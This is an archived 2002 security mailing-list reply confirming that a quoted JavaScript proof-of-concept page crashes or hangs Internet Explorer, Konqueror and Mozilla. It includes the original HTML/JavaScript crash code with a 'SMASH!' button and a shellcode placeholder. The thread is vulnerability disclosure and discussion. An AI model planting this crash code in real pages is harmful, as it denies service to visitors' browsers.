Vulnerability Development: Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Scott Mackenzie <smackenz () sdf lonestar org>
Date: 03 Jun 2002 00:47:52 +0100

After a few minutes testing it seems this does not only effect Internet
Explorer but also the following browsers:


In KDE's konqueror Latest Version it Seg Faults the browser instantly

In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed

Other information:

Netscape 6 series latest version does nothing when SMASH! is clicked

Galeon latest tries to mail a rather long email address, but the browser
itself is un-effected


Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 


---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------


On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:

the 28/07/1999 I have discovered a stack buffer overflow caused by until
the moment all the versions of the Internet Explorer.
In many windows98 causes the necessity to reinitiate the equipment, since
to my to seem it remains without memory.
Only it has been proven in several versions 5 of IE on WindowsNT
server sp6 and windows98 Second Edition.  As I said before the Windows 98
I had to reinitiate it to the force.
Can be possible to execute arbitrary code using the variable company of
the example?

// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se

-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
  var company;

  crear();
  address="s0t4ipv6 () shellcode com ar";
  soporte();
}
function soporte(){
  var soporte="bill () mocosoft com";
  window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
// window.location=company;             // also this line cause the bof.
  close(hacerMail());
}
function crear(){
company="shellcode here?\n";            // i don't think so.
}
</script>
  <input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------

Regards.

- Internet es perjudicial para la salud -
- Ley N~ 127.0.0.1

Matias Sedalo         
http://www.shellcode.com.ar

s0t4ipv6 () shellcode com ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
.......................................

By Date By Thread

Current thread:

Buffer Overflow with all versions of Internet Explorer and Javacript. Matias Sedalo (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
  - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
    - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. George Staikos (Jun 03)
    - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Nicolas Sigal (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Gian Fabio Palmerini (Jun 03)